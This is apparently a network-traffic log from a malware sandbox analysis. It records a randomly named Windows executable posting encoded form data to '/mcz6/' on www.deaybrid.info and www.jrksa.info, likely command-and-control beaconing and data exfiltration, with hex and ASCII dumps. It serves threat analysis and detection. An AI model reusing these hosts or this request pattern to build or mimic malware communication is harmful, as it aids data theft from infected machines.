Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:26:52.565318108 CEST	764	OUT	POST /mcz6/ HTTP/1.1 Host: www.deaybrid.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.deaybrid.info Referer: http://www.deaybrid.info/mcz6/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 55 35 31 5a 73 35 6a 2f 6e 66 65 61 34 69 69 45 31 52 42 41 72 38 4d 31 44 2f 43 39 53 61 2f 48 71 42 54 30 64 6a 4d 2b 69 49 78 65 44 74 63 49 52 30 65 7a 54 76 4c 69 55 51 51 74 70 35 61 4e 6b 71 38 70 53 76 70 6f 43 67 30 30 72 64 36 50 57 32 52 54 6a 64 4a 61 2b 5a 6e 4b 68 4e 48 76 56 2f 62 5a 62 65 42 37 47 56 4b 44 62 74 43 6d 65 4d 2b 74 70 72 52 52 41 46 46 61 42 72 6f 32 2f 53 68 50 79 6f 56 6e 6e 6a 79 45 38 55 49 4a 76 30 38 34 51 38 48 6b 73 50 54 76 52 6e 42 61 2f 63 65 5a 4f 66 35 52 4c 54 7a 64 63 73 49 6f 58 44 6b 58 50 6d 37 44 66 44 79 64 51 52 4b 39 4a 4c 52 75 32 69 51 4b 33 79 4a 62 34 57 55 44 4b 77 70 65 37 78 49 3d Data Ascii: l65lvjLx=U51Zs5j/nfea4iiE1RBAr8M1D/C9Sa/HqBT0djM+iIxeDtcIR0ezTvLiUQQtp5aNkq8pSvpoCg00rd6PW2RTjdJa+ZnKhNHvV/bZbeB7GVKDbtCmeM+tprRRAFFaBro2/ShPyoVnnjyE8UIJv084Q8HksPTvRnBa/ceZOf5RLTzdcsIoXDkXPm7DfDydQRK9JLRu2iQK3yJb4WUDKwpe7xI=
Jun 6, 2024 13:26:53.236579895 CEST	533	IN	HTTP/1.1 404 Not Found Date: Thu, 06 Jun 2024 11:26:53 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49767	162.0.237.22	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:26:55.092530012 CEST	10846	OUT	POST /mcz6/ HTTP/1.1 Host: www.deaybrid.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.deaybrid.info Referer: http://www.deaybrid.info/mcz6/ Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 55 35 31 5a 73 35 6a 2f 6e 66 65 61 34 69 69 45 31 52 42 41 72 38 4d 31 44 2f 43 39 53 61 2f 48 71 42 54 30 64 6a 4d 2b 69 49 4a 65 44 65 55 49 57 6e 32 7a 53 76 4c 69 56 51 51 6f 70 35 61 63 6b 71 45 74 53 76 6c 53 43 6c 77 30 72 2b 79 50 54 48 52 54 73 64 4a 61 6d 5a 6e 50 2b 39 47 6c 56 2f 4c 64 62 66 78 37 47 56 4b 44 62 6f 47 6d 61 64 2b 74 36 37 52 53 57 56 46 47 4b 4c 6f 61 2f 53 35 66 79 70 67 61 6d 51 36 45 38 30 59 4a 75 47 55 34 63 38 48 63 69 76 54 33 52 6e 4e 46 2f 63 44 67 4f 66 39 37 4c 54 58 64 51 72 6c 2b 44 77 6b 4f 59 55 2f 65 42 41 62 34 55 43 32 69 42 37 4a 78 6d 44 49 30 68 57 52 47 79 32 63 48 50 7a 49 61 6c 47 2b 44 70 70 2f 49 70 6b 52 59 49 52 4a 57 73 34 53 64 61 47 37 75 6e 6a 59 45 48 30 31 62 35 33 38 51 61 46 67 48 56 58 39 50 33 51 78 55 5a 6b 6b 37 34 78 7a 47 79 53 4f 4f 4d 72 43 70 6e 69 6f 4a 38 47 51 69 6a 54 6d 6a 47 41 4c 36 54 4d 41 63 30 73 65 53 75 62 58 76 71 4b 55 36 4d 67 73 59 46 4f 70 2f 33 4c 6e 6c 6b 72 62 7a 6a 75 56 48 59 [TRUNCATED] Data Ascii: l65lvjLx=U51Zs5j/nfea4iiE1RBAr8M1D/C9Sa/HqBT0djM+iIJeDeUIWn2zSvLiVQQop5ackqEtSvlSClw0r+yPTHRTsdJamZnP+9GlV/Ldbfx7GVKDboGmad+t67RSWVFGKLoa/S5fypgamQ6E80YJuGU4c8HcivT3RnNF/cDgOf97LTXdQrl+DwkOYU/eBAb4UC2iB7JxmDI0hWRGy2cHPzIalG+Dpp/IpkRYIRJWs4SdaG7unjYEH01b538QaFgHVX9P3QxUZkk74xzGySOOMrCpnioJ8GQijTmjGAL6TMAc0seSubXvqKU6MgsYFOp/3LnlkrbzjuVHYz+F/10c/3VcOrNcPwmhk9lsKQy0UHAC88BhwvvPSnAKQF1M4hgPkmDWFYuoIoJ3Gf6Nv1b/3FIAt7PCNJaTcTZIgcauxW4MQ7QcTKgXkcC6oRupfXyOBkdU74usK2iaiNru3/ZNwwVYZS79iOnKxdL62472iAuX0uzJ4buvCQq3E02ihrioB9fU+p90DR3d/rDnBn0iriIvOcoHCc92Edw6pxnkDGo8409kcXG8v/m2kFSHnykDY2wiQcBUAyEV/MmseHc2NU8IIXEVE0xXwA3N9yukdTrGu/sED55L4MfpXWu5ttR7UjENxzJ3tU8uv6jnLf8IRzibe8G3jt6y5lCflgRqV7IRbLydsc1d9XGYjLuadBJnoBGDLmNMdr9Lt6SCVJB0comE4/UbSk7ZXraii+giYpVPW+GvETDSEFRtPm63r5fNAxNa1iD4bs7kCS8oGdxr6UbJGuMB9ItXeAGOXLHz26RU2fdj2I5pmlcaGk9NHZGdLLV4RvDwl9aDBRmiPeHtg2qooLDVIKnanhWWn6LQGx0X31ORz8kCLBsOrcWo1OrlOQux4664HxcKBNvWvuRZpMgtW3o06sMqNhB0qopg+rbHEHNMwQnVYUircy6RZX2HSnuYDdOjqLDNKAWdvZui55l9uAgM8nGD17itShzALsEo3Ct [TRUNCATED]
Jun 6, 2024 13:26:55.766551018 CEST	533	IN	HTTP/1.1 404 Not Found Date: Thu, 06 Jun 2024 11:26:55 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49768	162.0.237.22	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:26:57.622371912 CEST	482	OUT	GET /mcz6/?l65lvjLx=Z7d5vO3PiPWE/zeJlxtYmOYnF8uMEonypBLuOElxuuV1BOUgEEq9TvThZhsN+4G3m8UtXtkpFAILmOKtc08U8eULhaLH/eruf+vtSehKJ3r2fKzbVPqM3Ks=&Znv8F=zltpR6V05ztTbh HTTP/1.1 Host: www.deaybrid.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 6, 2024 13:26:58.284512043 CEST	548	IN	HTTP/1.1 404 Not Found Date: Thu, 06 Jun 2024 11:26:58 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49769	136.143.180.12	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:27:11.747598886 CEST	735	OUT	POST /mcz6/ HTTP/1.1 Host: www.jrksa.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.jrksa.info Referer: http://www.jrksa.info/mcz6/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 30 66 58 2f 33 56 6a 38 6b 36 47 39 57 7a 75 49 72 4d 6a 34 31 68 48 31 6d 2b 63 48 78 68 34 75 43 6c 6a 66 6b 67 75 39 77 66 6f 76 69 30 6a 48 74 65 46 59 69 39 71 62 38 71 6a 50 69 49 45 72 69 65 75 74 73 77 41 58 76 50 51 78 67 4c 36 42 77 64 31 67 76 32 54 4d 2f 6e 75 32 76 59 32 32 69 57 6c 49 39 7a 66 38 53 64 4c 79 59 39 30 65 42 32 46 33 38 6b 74 69 55 43 66 46 63 4b 33 42 51 56 35 2f 56 43 55 54 50 56 71 64 6b 54 7a 6b 67 4e 38 69 72 39 45 33 31 2b 37 30 5a 74 39 68 46 79 65 37 57 54 64 39 6a 66 5a 73 53 56 61 46 6f 72 74 51 62 30 77 62 48 35 39 35 53 72 73 2f 6d 51 3d 3d Data Ascii: l65lvjLx=0fX/3Vj8k6G9WzuIrMj41hH1m+cHxh4uCljfkgu9wfovi0jHteFYi9qb8qjPiIErieutswAXvPQxgL6Bwd1gv2TM/nu2vY22iWlI9zf8SdLyY90eB2F38ktiUCfFcK3BQV5/VCUTPVqdkTzkgN8ir9E31+70Zt9hFye7WTd9jfZsSVaFortQb0wbH595Srs/mQ==
Jun 6, 2024 13:27:12.430398941 CEST	1236	IN	HTTP/1.1 404 Server: ZGS Date: Thu, 06 Jun 2024 11:27:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: 8ae64e9492=a150874439e1189f3c77bc52f348ab3f; Path=/ Set-Cookie: csrfc=7971e634-1cbb-4bec-af17-582f540b3387;path=/;priority=high Set-Cookie: _zcsr_tmp=7971e634-1cbb-4bec-af17-582f540b3387;path=/;SameSite=Strict;priority=high Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT vary: accept-encoding Content-Encoding: gzip Data Raw: 35 36 63 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cd 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 c8 92 25 2b 76 14 d9 c1 9a 0c c5 9e 3a 20 03 86 0d 7b a1 25 ca e2 42 89 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 92 e5 69 76 03 8b e2 b9 f1 7c df 39 24 1b 7d b8 fd 7e f3 db 1f bf fe 8c 32 95 b3 d5 0f 51 f5 83 10 8a 32 82 13 f3 a4 07 39 51 18 15 38 27 4b 4b f0 35 57 d2 42 31 2f 14 29 d4 d2 2a 38 2d 12 b2 3f 47 05 4f 39 63 7c a7 9f b0 88 33 fa 40 f4 a3 2c 68 59 12 65 21 e7 68 4e 51 c5 c8 ea 4f 9e f1 c8 a9 9e 0f 33 8c 16 f7 48 3d 96 e0 48 91 bd 72 62 09 ae 04 61 4b 4b aa 47 46 64 46 b4 a5 4c 90 74 69 39 3b b2 4e 21 0a 79 9d e2 9c b2 c7 e5 f7 92 14 3f de e1 42 86 33 d7 3d bf 70 5d eb 68 d7 68 1f 46 f0 59 f3 e4 f1 f9 34 84 8f b6 64 57 86 42 4b 5b 42 da 92 75 8e 24 fc d8 92 08 9a 5e f5 15 24 7d 22 e1 74 5a ee db 73 39 16 1b 5a 84 2e bc 47 ad 89 12 27 09 2d 36 03 33 6b 1c df 6f 04 df 16 89 1d 73 c6 45 78 96 06 fa db 30 fc cf e9 71 a2 78 79 a3 c5 e4 f3 88 95 10 d9 39 7f b2 21 a1 04 0b 7b 23 70 42 01 ae cf 8c a4 ea 1c 9d a5 [TRUNCATED] Data Ascii: 56cX[o6~`h%+v: {%BINRkiv\|9$}~2Q29Q8'KK5WB1/)8-?GO9c\|3@,hYe!hNQO3H=HrbaKKGFdFLti9;N!y?B3=p]hhFY4dWBK[Bu$^$}"tZs9Z.G'-63kosEx0qxy9!{#pBl'xz=pgs?h#34]5u?~],=[2B7M,rL`cGHe4<g.;o]c9/0~EBBuIh[2},t;s?V\|j`8V!N2\|X`-M1lbq\h#:5&b> QF^@3z]EgFlK1(KUA5,Uy@/l49^FMf#
Jun 6, 2024 13:27:12.430469990 CEST	715	IN	Data Raw: fc 31 b8 74 91 bf 07 8e 37 81 fa 5a be 27 95 00 ec b3 cf e3 39 81 d9 e6 26 d7 54 4f b8 6e 9a 55 a7 e9 58 a8 bb 8f ee e1 b7 c1 98 be d1 a6 45 ca 47 ca c4 24 7c 36 5e 6a 47 7d c4 28 ea da 68 c2 7e f1 02 64 9a ad 80 5b 67 9a 51 09 da fa bc 01 e9 2d Data Ascii: 1t7Z'9&TOnUXEG$\|6^jG}(h~d[gQ-$t86mwMOwKk/2?P9_]o=y+8Zo*^N0bV]s]$=OT[$pg?vQo2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49770	136.143.180.12	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:27:14.281341076 CEST	755	OUT	POST /mcz6/ HTTP/1.1 Host: www.jrksa.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.jrksa.info Referer: http://www.jrksa.info/mcz6/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 30 66 58 2f 33 56 6a 38 6b 36 47 39 58 54 2b 49 75 71 72 34 69 52 48 36 72 75 63 48 34 42 34 71 43 6c 2f 66 6b 6b 57 58 77 70 34 76 68 51 6e 48 73 66 46 59 68 39 71 62 79 4b 6a 41 6d 49 45 38 69 65 79 50 73 31 6f 58 76 50 55 78 67 4a 53 42 78 74 4a 6e 73 47 54 4f 7a 48 75 30 69 34 32 32 69 57 6c 49 39 7a 4c 47 53 64 44 79 59 4d 45 65 54 44 70 30 79 45 74 74 64 69 66 46 59 4b 33 46 51 56 35 42 56 44 49 35 50 58 43 64 6b 54 44 6b 67 66 45 68 69 39 45 78 37 65 36 4b 52 65 63 50 4d 6e 79 36 55 43 31 48 6f 72 64 36 61 7a 4c 66 35 61 4d 48 4a 30 55 6f 61 2b 30 4e 66 6f 52 32 39 58 43 68 4c 32 67 32 71 79 69 37 4d 66 6d 79 45 6b 4b 4a 74 78 4d 3d Data Ascii: l65lvjLx=0fX/3Vj8k6G9XT+Iuqr4iRH6rucH4B4qCl/fkkWXwp4vhQnHsfFYh9qbyKjAmIE8ieyPs1oXvPUxgJSBxtJnsGTOzHu0i422iWlI9zLGSdDyYMEeTDp0yEttdifFYK3FQV5BVDI5PXCdkTDkgfEhi9Ex7e6KRecPMny6UC1Hord6azLf5aMHJ0Uoa+0NfoR29XChL2g2qyi7MfmyEkKJtxM=
Jun 6, 2024 13:27:14.979567051 CEST	1236	IN	HTTP/1.1 404 Server: ZGS Date: Thu, 06 Jun 2024 11:27:14 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: 8ae64e9492=4f8d155d92baa51fc002217e6d409cd9; Path=/ Set-Cookie: csrfc=b1e16f21-81c8-4c4b-8a75-9935d65771c2;path=/;priority=high Set-Cookie: _zcsr_tmp=b1e16f21-81c8-4c4b-8a75-9935d65771c2;path=/;SameSite=Strict;priority=high Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT vary: accept-encoding Content-Encoding: gzip Data Raw: 35 36 63 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cd 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 c8 92 25 2b 76 14 d9 c1 9a 0c c5 9e 3a 20 03 86 0d 7b a1 25 ca e2 42 89 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 92 e5 69 76 03 8b e2 b9 f1 7c df 39 24 1b 7d b8 fd 7e f3 db 1f bf fe 8c 32 95 b3 d5 0f 51 f5 83 10 8a 32 82 13 f3 a4 07 39 51 18 15 38 27 4b 4b f0 35 57 d2 42 31 2f 14 29 d4 d2 2a 38 2d 12 b2 3f 47 05 4f 39 63 7c a7 9f b0 88 33 fa 40 f4 a3 2c 68 59 12 65 21 e7 68 4e 51 c5 c8 ea 4f 9e f1 c8 a9 9e 0f 33 8c 16 f7 48 3d 96 e0 48 91 bd 72 62 09 ae 04 61 4b 4b aa 47 46 64 46 b4 a5 4c 90 74 69 39 3b b2 4e 21 0a 79 9d e2 9c b2 c7 e5 f7 92 14 3f de e1 42 86 33 d7 3d bf 70 5d eb 68 d7 68 1f 46 f0 59 f3 e4 f1 f9 34 84 8f b6 64 57 86 42 4b 5b 42 da 92 75 8e 24 fc d8 92 08 9a 5e f5 15 24 7d 22 e1 74 5a ee db 73 39 16 1b 5a 84 2e bc 47 ad 89 12 27 09 2d 36 03 33 6b 1c df 6f 04 df 16 89 1d 73 c6 45 78 96 06 fa db 30 fc cf e9 71 a2 78 79 a3 c5 e4 f3 88 95 10 d9 39 7f b2 21 a1 04 0b 7b 23 70 42 01 ae cf 8c a4 ea 1c 9d a5 [TRUNCATED] Data Ascii: 56cX[o6~`h%+v: {%BINRkiv\|9$}~2Q29Q8'KK5WB1/)8-?GO9c\|3@,hYe!hNQO3H=HrbaKKGFdFLti9;N!y?B3=p]hhFY4dWBK[Bu$^$}"tZs9Z.G'-63kosEx0qxy9!{#pBl'xz=pgs?h#34]5u?~],=[2B7M,rL`cGHe4<g.;o]c9/0~EBBuIh[2},t;s?V\|j`8V!N2\|X`-M1lbq\h#:5&b> QF^@3z]EgFlK1(KUA5,Uy@/l49^FMf#
Jun 6, 2024 13:27:14.985804081 CEST	715	IN	Data Raw: fc 31 b8 74 91 bf 07 8e 37 81 fa 5a be 27 95 00 ec b3 cf e3 39 81 d9 e6 26 d7 54 4f b8 6e 9a 55 a7 e9 58 a8 bb 8f ee e1 b7 c1 98 be d1 a6 45 ca 47 ca c4 24 7c 36 5e 6a 47 7d c4 28 ea da 68 c2 7e f1 02 64 9a ad 80 5b 67 9a 51 09 da fa bc 01 e9 2d Data Ascii: 1t7Z'9&TOnUXEG$\|6^jG}(h~d[gQ-$t86mwMOwKk/2?P9_]o=y+8Zo*^N0bV]s]$=OT[$pg?vQo2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49771	136.143.180.12	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:27:16.809150934 CEST	10837	OUT	POST /mcz6/ HTTP/1.1 Host: www.jrksa.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.jrksa.info Referer: http://www.jrksa.info/mcz6/ Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 30 66 58 2f 33 56 6a 38 6b 36 47 39 58 54 2b 49 75 71 72 34 69 52 48 36 72 75 63 48 34 42 34 71 43 6c 2f 66 6b 6b 57 58 77 70 77 76 69 6c 7a 48 74 38 64 59 67 39 71 62 36 71 6a 44 6d 49 46 2b 69 65 71 4c 73 31 74 6f 76 4e 38 78 76 4b 71 42 67 75 52 6e 33 32 54 4f 75 33 75 33 76 59 33 32 69 53 35 4d 39 7a 62 47 53 64 44 79 59 50 73 65 51 57 46 30 69 30 74 69 55 43 66 42 63 4b 33 74 51 56 68 52 56 44 38 44 50 48 69 64 6e 7a 54 6b 6a 71 51 68 74 39 45 7a 34 65 36 43 52 65 51 4d 4d 6a 54 44 55 43 78 74 6f 73 56 36 65 6e 61 48 6b 72 34 38 58 56 4d 4c 45 50 41 50 51 6f 46 47 33 6e 32 4f 44 44 41 52 33 43 37 55 49 75 37 4a 58 56 44 49 2b 47 2b 32 58 7a 4a 76 37 33 2f 68 51 6e 6a 63 6f 75 35 63 4f 66 4f 72 64 75 4b 68 2b 4a 34 43 39 47 41 33 55 7a 74 4f 37 4f 2b 49 69 62 4e 43 42 6c 73 58 36 74 57 6c 76 55 37 4d 62 69 5a 38 34 34 59 65 51 32 6e 4c 78 78 30 4b 47 4a 4b 54 57 54 53 73 75 78 6b 6e 39 65 6b 76 46 45 49 6f 56 30 39 55 61 44 38 63 61 52 52 6c 63 62 32 66 51 43 6f 39 37 [TRUNCATED] Data Ascii: l65lvjLx=0fX/3Vj8k6G9XT+Iuqr4iRH6rucH4B4qCl/fkkWXwpwvilzHt8dYg9qb6qjDmIF+ieqLs1tovN8xvKqBguRn32TOu3u3vY32iS5M9zbGSdDyYPseQWF0i0tiUCfBcK3tQVhRVD8DPHidnzTkjqQht9Ez4e6CReQMMjTDUCxtosV6enaHkr48XVMLEPAPQoFG3n2ODDAR3C7UIu7JXVDI+G+2XzJv73/hQnjcou5cOfOrduKh+J4C9GA3UztO7O+IibNCBlsX6tWlvU7MbiZ844YeQ2nLxx0KGJKTWTSsuxkn9ekvFEIoV09UaD8caRRlcb2fQCo97PBZnA02REbE1duqlJYyyNHetqnjtNlkyDmboboIQTEmyCzXkW/Djw7mMvj4jYZSEAa0bjv5rlHoJl6R9OHqonqXQJZz7EVWG2atpEQRN+cZeS9at2mMek/LOobQQjJ4CNXxqIgXbjWo6AqxcsH9p+PILAuKOAbBFz9lnkFTFfBWvG+9Vhb/3xp6kg3BHOfT4sDvYCrd3oElAXGmLje805pU6HJ/5AC7FZfxGy3HKQIkJd7iNsPiI3j+h8K+LiyX0oqIsPpbcCK3wAGLX10tlxqVU8Lk7Y2M3ib+zgy1QGCnevdhPitGi0rvfnSqPcnCTVVztRFbkzvplidNp37z9uG08vd4SBbs6g4rdqt/E37UvaUA9iHHWQKtylPVVMVXkL/YT1hSRrX7q9TmtIX21QRps1/2Dm3lnUXaO86IhkzL/xZvzFqAalK+D43nnzRNIVAa/A1WZsGQcNVE88Mfg0h8qGc3SFl1kA9nP7J9VIeq9xWk/I7YSGZczIbYOfJ6iyGBDc165zYoBB8+B/tXAyv6Ed0pQ1IxGZej5